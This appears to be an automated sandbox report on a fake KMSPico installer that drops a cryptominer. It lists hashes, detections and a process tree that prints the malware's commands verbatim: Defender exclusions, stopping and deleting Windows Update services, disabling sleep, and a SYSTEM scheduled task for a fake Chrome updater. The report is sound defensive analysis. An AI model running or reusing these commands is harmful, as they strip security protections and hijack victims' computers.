Analysis
-
max time kernel
269s -
max time network
261s -
platform
windows7_x64 -
resource
win7-20230703-en -
resource tags
arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system -
submitted
08/07/2023, 22:24
Static task
static1
Behavioral task
behavioral1
Sample
KMSPicoSetup.exe
Resource
win7-20230703-en
General
-
Target
KMSPicoSetup.exe
-
Size
724.8MB
-
MD5
0dabba05272439229d7463e08e836063
-
SHA1
f46c049533ebb0d8b92bf6e718db6e7b17eb3d64
-
SHA256
6d7056c8c31fc91e9ef9ee93f4b1f667c737a3ae0260131a7420e02dbd527107
-
SHA512
3f56c82ea5c982686686b8b86d8eaafb991b32e9834939c90992d7d4356e1598e78fdf29fd7916e8da6ee660723a8710e342f3bf92f2e5abb68d3a4271df7a22
-
SSDEEP
98304:KeXVWQlqRmGR7C0QEd+WXS/9BiwWoAqsom:BV7lVIbQZ9Bzm
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
description pid Process procid_target PID 2964 created 1280 2964 KMSPicoSetup.exe 12 PID 2964 created 1280 2964 KMSPicoSetup.exe 12 PID 2964 created 1280 2964 KMSPicoSetup.exe 12 PID 2964 created 1280 2964 KMSPicoSetup.exe 12 PID 2964 created 1280 2964 KMSPicoSetup.exe 12 PID 2496 created 1280 2496 updater.exe 12 PID 2496 created 1280 2496 updater.exe 12 PID 2496 created 1280 2496 updater.exe 12 PID 2496 created 1280 2496 updater.exe 12 PID 2496 created 1280 2496 updater.exe 12 PID 864 created 1280 864 conhost.exe 12 PID 2496 created 1280 2496 updater.exe 12 PID 2496 created 1280 2496 updater.exe 12 -
XMRig Miner payload 19 IoCs
resource yara_rule behavioral1/memory/2988-114-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2988-115-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2988-119-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2988-122-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2988-124-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2988-127-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2988-129-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2988-131-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2988-133-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2988-140-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2988-142-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2988-144-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2988-146-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2988-148-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2988-150-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2988-152-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2988-154-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2988-156-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2988-158-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts KMSPicoSetup.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
pid Process 2496 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 2760 taskeng.exe -
resource yara_rule behavioral1/memory/2988-114-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2988-115-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2988-119-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2988-122-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2988-124-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2988-127-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2988-129-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2988-131-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2988-133-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2988-140-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2988-142-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2988-144-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2988-146-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2988-148-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2988-150-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2988-152-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2988-154-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2988-156-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2988-158-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2496 set thread context of 864 2496 updater.exe 79 PID 2496 set thread context of 2988 2496 updater.exe 86 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe KMSPicoSetup.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2388 sc.exe 1048 sc.exe 968 sc.exe 2016 sc.exe 2664 sc.exe 2236 sc.exe 872 sc.exe 2908 sc.exe 1468 sc.exe 320 sc.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2576 schtasks.exe 2240 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1956 WMIC.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0d59081ebb1d901 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2964 KMSPicoSetup.exe 2964 KMSPicoSetup.exe 664 powershell.exe 2964 KMSPicoSetup.exe 2964 KMSPicoSetup.exe 2964 KMSPicoSetup.exe 2964 KMSPicoSetup.exe 2964 KMSPicoSetup.exe 2964 KMSPicoSetup.exe 836 powershell.exe 2964 KMSPicoSetup.exe 2964 KMSPicoSetup.exe 2772 powershell.exe 2496 updater.exe 2496 updater.exe 2732 powershell.exe 2496 updater.exe 2496 updater.exe 2496 updater.exe 2496 updater.exe 2496 updater.exe 2496 updater.exe 2484 powershell.exe 2496 updater.exe 2496 updater.exe 864 conhost.exe 864 conhost.exe 2496 updater.exe 2496 updater.exe 2496 updater.exe 2496 updater.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe 2988 nslookup.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 39 IoCs
description pid Process Token: SeDebugPrivilege 664 powershell.exe Token: SeShutdownPrivilege 1196 powercfg.exe Token: SeShutdownPrivilege 1176 powercfg.exe Token: SeDebugPrivilege 836 powershell.exe Token: SeShutdownPrivilege 2132 powercfg.exe Token: SeShutdownPrivilege 916 powercfg.exe Token: SeDebugPrivilege 2772 powershell.exe Token: SeDebugPrivilege 2732 powershell.exe Token: SeShutdownPrivilege 2532 powercfg.exe Token: SeDebugPrivilege 2484 powershell.exe Token: SeShutdownPrivilege 1560 powercfg.exe Token: SeShutdownPrivilege 2840 powercfg.exe Token: SeShutdownPrivilege 2824 powercfg.exe Token: SeDebugPrivilege 2496 updater.exe Token: SeAssignPrimaryTokenPrivilege 1956 WMIC.exe Token: SeIncreaseQuotaPrivilege 1956 WMIC.exe Token: SeSecurityPrivilege 1956 WMIC.exe Token: SeTakeOwnershipPrivilege 1956 WMIC.exe Token: SeLoadDriverPrivilege 1956 WMIC.exe Token: SeSystemtimePrivilege 1956 WMIC.exe Token: SeBackupPrivilege 1956 WMIC.exe Token: SeRestorePrivilege 1956 WMIC.exe Token: SeShutdownPrivilege 1956 WMIC.exe Token: SeSystemEnvironmentPrivilege 1956 WMIC.exe Token: SeUndockPrivilege 1956 WMIC.exe Token: SeManageVolumePrivilege 1956 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1956 WMIC.exe Token: SeIncreaseQuotaPrivilege 1956 WMIC.exe Token: SeSecurityPrivilege 1956 WMIC.exe Token: SeTakeOwnershipPrivilege 1956 WMIC.exe Token: SeLoadDriverPrivilege 1956 WMIC.exe Token: SeSystemtimePrivilege 1956 WMIC.exe Token: SeBackupPrivilege 1956 WMIC.exe Token: SeRestorePrivilege 1956 WMIC.exe Token: SeShutdownPrivilege 1956 WMIC.exe Token: SeSystemEnvironmentPrivilege 1956 WMIC.exe Token: SeUndockPrivilege 1956 WMIC.exe Token: SeManageVolumePrivilege 1956 WMIC.exe Token: SeLockMemoryPrivilege 2988 nslookup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 272 wrote to memory of 2236 272 cmd.exe 37 PID 272 wrote to memory of 2236 272 cmd.exe 37 PID 272 wrote to memory of 2236 272 cmd.exe 37 PID 1480 wrote to memory of 1196 1480 cmd.exe 36 PID 1480 wrote to memory of 1196 1480 cmd.exe 36 PID 1480 wrote to memory of 1196 1480 cmd.exe 36 PID 1480 wrote to memory of 1176 1480 cmd.exe 38 PID 1480 wrote to memory of 1176 1480 cmd.exe 38 PID 1480 wrote to memory of 1176 1480 cmd.exe 38 PID 272 wrote to memory of 1468 272 cmd.exe 39 PID 272 wrote to memory of 1468 272 cmd.exe 39 PID 272 wrote to memory of 1468 272 cmd.exe 39 PID 272 wrote to memory of 320 272 cmd.exe 40 PID 272 wrote to memory of 320 272 cmd.exe 40 PID 272 wrote to memory of 320 272 cmd.exe 40 PID 1480 wrote to memory of 2132 1480 cmd.exe 41 PID 1480 wrote to memory of 2132 1480 cmd.exe 41 PID 1480 wrote to memory of 2132 1480 cmd.exe 41 PID 272 wrote to memory of 872 272 cmd.exe 42 PID 272 wrote to memory of 872 272 cmd.exe 42 PID 272 wrote to memory of 872 272 cmd.exe 42 PID 1480 wrote to memory of 916 1480 cmd.exe 43 PID 1480 wrote to memory of 916 1480 cmd.exe 43 PID 1480 wrote to memory of 916 1480 cmd.exe 43 PID 272 wrote to memory of 2908 272 cmd.exe 44 PID 272 wrote to memory of 2908 272 cmd.exe 44 PID 272 wrote to memory of 2908 272 cmd.exe 44 PID 272 wrote to memory of 1056 272 cmd.exe 45 PID 272 wrote to memory of 1056 272 cmd.exe 45 PID 272 wrote to memory of 1056 272 cmd.exe 45 PID 272 wrote to memory of 2244 272 cmd.exe 46 PID 272 wrote to memory of 2244 272 cmd.exe 46 PID 272 wrote to memory of 2244 272 cmd.exe 46 PID 836 wrote to memory of 2240 836 powershell.exe 47 PID 836 wrote to memory of 2240 836 powershell.exe 47 PID 836 wrote to memory of 2240 836 powershell.exe 47 PID 272 wrote to memory of 2444 272 cmd.exe 48 PID 272 wrote to memory of 2444 272 cmd.exe 48 PID 272 wrote to memory of 2444 272 cmd.exe 48 PID 272 wrote to memory of 1600 272 cmd.exe 49 PID 272 wrote to memory of 1600 272 cmd.exe 49 PID 272 wrote to memory of 1600 272 cmd.exe 49 PID 272 wrote to memory of 1068 272 cmd.exe 50 PID 272 wrote to memory of 1068 272 cmd.exe 50 PID 272 wrote to memory of 1068 272 cmd.exe 50 PID 2772 wrote to memory of 2724 2772 powershell.exe 53 PID 2772 wrote to memory of 2724 2772 powershell.exe 53 PID 2772 wrote to memory of 2724 2772 powershell.exe 53 PID 2760 wrote to memory of 2496 2760 taskeng.exe 55 PID 2760 wrote to memory of 2496 2760 taskeng.exe 55 PID 2760 wrote to memory of 2496 2760 taskeng.exe 55 PID 2540 wrote to memory of 2532 2540 cmd.exe 65 PID 2540 wrote to memory of 2532 2540 cmd.exe 65 PID 2540 wrote to memory of 2532 2540 cmd.exe 65 PID 2656 wrote to memory of 2388 2656 cmd.exe 64 PID 2656 wrote to memory of 2388 2656 cmd.exe 64 PID 2656 wrote to memory of 2388 2656 cmd.exe 64 PID 2656 wrote to memory of 1048 2656 cmd.exe 66 PID 2656 wrote to memory of 1048 2656 cmd.exe 66 PID 2656 wrote to memory of 1048 2656 cmd.exe 66 PID 2540 wrote to memory of 1560 2540 cmd.exe 69 PID 2540 wrote to memory of 1560 2540 cmd.exe 69 PID 2540 wrote to memory of 1560 2540 cmd.exe 69 PID 2656 wrote to memory of 968 2656 cmd.exe 67 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1280
-
C:\Users\Admin\AppData\Local\Temp\KMSPicoSetup.exe"C:\Users\Admin\AppData\Local\Temp\KMSPicoSetup.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:664
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:272 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2236
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1468
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:320
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:872
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2908
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1056
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:2244
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:2444
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:1600
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1068
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1196
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1176
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ilsgulb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'UpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'UpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "UpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn UpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2240
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ucxkkl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "UpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn UpdateTaskMachineQC3⤵PID:2724
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ilsgulb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'UpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'UpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "UpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2484 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn UpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2576
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2388
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1048
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:968
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2016
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2664
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:2740
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:2784
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:2888
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:2588
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:2808
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ngibtzhrxukrld2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:864
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:560
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1804
-
-
C:\Windows\System32\nslookup.exeC:\Windows\System32\nslookup.exe apkyndzzcsghxavu 6E3sjfZq2rJQaxvLPmXgsCZAIMpmPntHEIWDH08V2Q2UvCZXbM1ef6ujRrONrqFfzaYi2v+BoClcnLkmLs7zuUcMndCEMdjZP2dRivz4y8v8yuI63joGWh/zKsLG3F7tQaCIgTrlBPerp4C8TVC13v68tPOJDIW2IuCHG8TUMsjBous5lEJ9R2BhorxNtEYHLLxAz4tJJZdv124elm/Xq0kG3hIPwJeQPOuMxMfznHre41ysZ8eg3E7xCK3JXhPZYO7PvklKqwnwDbHeVSc3uHSuCWuM/lTY8vg3iXVzwAmNDeubSCvXZ6T1/WLIEDo2b1by8dRCQizHr4v7gwKh41W76S9QTX+7Df+A1kq04wRn8Nu1XexuoGxVTMW7ILMuU78uvPoZ/LA6rxGqip54J+N/DVofyGYdeT4sdGGvKjJCsabEd4ojEPZsCwDeiMHlhYG2zcQ40qYmbYnD1ROZJs4BxInK48r8y/KIul90oAQtJ0470pebDvSYJX1c3HYm2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2988
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {A6A35DD4-0623-4B59-8840-D06D1814558C} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor1⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1956
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
724.8MB
MD50dabba05272439229d7463e08e836063
SHA1f46c049533ebb0d8b92bf6e718db6e7b17eb3d64
SHA2566d7056c8c31fc91e9ef9ee93f4b1f667c737a3ae0260131a7420e02dbd527107
SHA5123f56c82ea5c982686686b8b86d8eaafb991b32e9834939c90992d7d4356e1598e78fdf29fd7916e8da6ee660723a8710e342f3bf92f2e5abb68d3a4271df7a22
-
Filesize
724.8MB
MD50dabba05272439229d7463e08e836063
SHA1f46c049533ebb0d8b92bf6e718db6e7b17eb3d64
SHA2566d7056c8c31fc91e9ef9ee93f4b1f667c737a3ae0260131a7420e02dbd527107
SHA5123f56c82ea5c982686686b8b86d8eaafb991b32e9834939c90992d7d4356e1598e78fdf29fd7916e8da6ee660723a8710e342f3bf92f2e5abb68d3a4271df7a22
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53671ab0fc1d3692d632ce45007170e31
SHA1b7906be022b9186c18caecd4beba3301ee08849b
SHA2563f8779e7a539d3d4ef3792149074a1aa6f4978d862d2f5ad1ac2b6e5d3f34bde
SHA51258d9365b6149e53812756d97ff9269d5e0fa93ed3f86c5cf8605bc9145bd011ffb7f9dd8221409a548f909cbc7be53b166d7c22c2240f54cb51e8a46ca45641d
-
